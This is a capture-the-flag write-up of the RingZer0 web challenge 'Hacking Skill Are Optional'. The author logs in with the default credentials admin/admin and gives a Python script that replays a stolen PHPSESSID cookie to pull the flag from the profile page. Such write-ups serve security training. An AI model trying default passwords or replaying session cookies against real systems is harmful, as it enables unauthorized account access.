
🌐 Hacking Skill Are Optional

A detailed write-up of the Web challenge 'Hacking Skill Are Optional' from RingZer0 CTF

/images/RingZer0CTF/HackingSkillAreOptional/challenge_presentation.png
Challenge Presentation

📊 Challenge Overview

Category    | Details                | Additional Info
🏆 Event     | RingZer0 CTF           | Event Link
🔰 Category  | Web                    | 🌐
💎 Points    | 1                      | Out of 1 total
⭐ Difficulty | 🟢 Easy                | Personal Rating: 1/10
👤 Author    | Breached Company       | Profile
🎮 Solves    | 344 (at the time of flag submission) | solve rate
📅 Date      | 06-03-2025             | RingZer0 CTF
🦾 Solved By | mH4ck3r0n3             | Team:

🎯 Challenge Files & Infrastructure

Provided Files

Files: None

🔍 Initial Analysis

First Steps

Initially, the website appears as follows:

/images/RingZer0CTF/HackingSkillAreOptional/site_presentation.png
Site Presentation

We are given a link (https://www.itgovernance.co.uk/blog/63-of-data-breaches-involve-weak-default-or-stolen-passwords) to an article that discusses data breaches caused by weak default passwords. Let’s move on to the exploitation phase.

🎯 Solution Path

Exploitation Steps

Exploitation

The first thing that came to my mind was to try accessing https://ringzer0ctf.com/login with default credentials. The most common ones are username=admin&password=admin.

/images/RingZer0CTF/HackingSkillAreOptional/admin_login.png
Admin Login

By trying to log in with these credentials and going to the Your Profile section (https://ringzer0ctf.com/user), I found the flag in the E-mail field.

Flag capture

/images/RingZer0CTF/HackingSkillAreOptional/manual_flag.png
Manual Flag

🛠️ Exploitation Process

Approach

The automated exploit hard-codes the PHPSESSID cookie of the admin session obtained from the manual login, because fully automating the login form is awkward due to its CSRF token. It then sends a GET request to /user and extracts the flag from the response with a regex.
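The automation described above, written out as an added example rather than the author's own script: it reuses a PHPSESSID cookie, requests /user and pulls the flag from the E-mail input. The FLAG- prefix and the markup of the profile page are assumptions, and the embedded HTML is a constructed sample so the parser can be exercised offline.

```python
import re
import sys
import urllib.request
from typing import Optional

USER_URL = "https://ringzer0ctf.com/user"

# Assumed flag format; the write-up does not state it.
FLAG_RE = re.compile(r"FLAG-[0-9A-Za-z]{8,}")
INPUT_TAG_RE = re.compile(r"<input\b[^>]*>", re.IGNORECASE)
VALUE_RE = re.compile(r'value="([^"]*)"', re.IGNORECASE)


def extract_flag(html: str) -> Optional[str]:
    """Return the flag found in the E-mail input of the profile page, else None.

    Attribute order inside the <input> tag is not assumed: the tag is located
    by its name="email" attribute and the value is read separately.
    """
    for tag in INPUT_TAG_RE.findall(html):
        if not re.search(r'name="email"', tag, re.IGNORECASE):
            continue
        value = VALUE_RE.search(tag)
        if value is None:
            return None
        flag = FLAG_RE.search(value.group(1))
        return flag.group(0) if flag else None
    return None


def fetch_profile(phpsessid: str, url: str = USER_URL, timeout: float = 10.0) -> str:
    """GET the profile page with an existing session cookie.

    Reusing PHPSESSID skips the login form and its CSRF token entirely.
    """
    req = urllib.request.Request(url, headers={"Cookie": f"PHPSESSID={phpsessid}"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample of a profile form (not real output from the site).
SAMPLE_HTML = """
<form>
  <label>Username</label><input type="text" name="username" value="admin">
  <label>E-mail</label><input type="text" name="email" value="FLAG-EXAMPLE0123456789">
</form>
"""

if __name__ == "__main__":
    # Pass the admin session's PHPSESSID as the only argument to run it live.
    html = fetch_profile(sys.argv[1]) if len(sys.argv) == 2 else SAMPLE_HTML
    print(extract_flag(html))
```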

🚩 Flag Capture

Flag

Proof of Execution

/images/RingZer0CTF/HackingSkillAreOptional/automated_flag.png
Automated Flag
Screenshot of successful exploitation

🔧 Tools Used

Tool   | Purpose
Python | Exploit

💡 Key Learnings

Skills Improved

  • Binary Exploitation
  • Reverse Engineering
  • Web Exploitation
  • Cryptography
  • Forensics
  • OSINT
  • Miscellaneous

📚 References & Resources

Learning Resources


📊 Final Statistics

Metric          | Value         | Notes
Time to Solve   | 00:01         | From start to flag
Global Ranking  | 14059 / 51297 (at the time of flag submission) | Challenge ranking
Points Earned   | 1             | Team contribution

Created: 06-03-2025 • Last Modified: 06-03-2025 • Author: mH4ck3r0n3 • Team: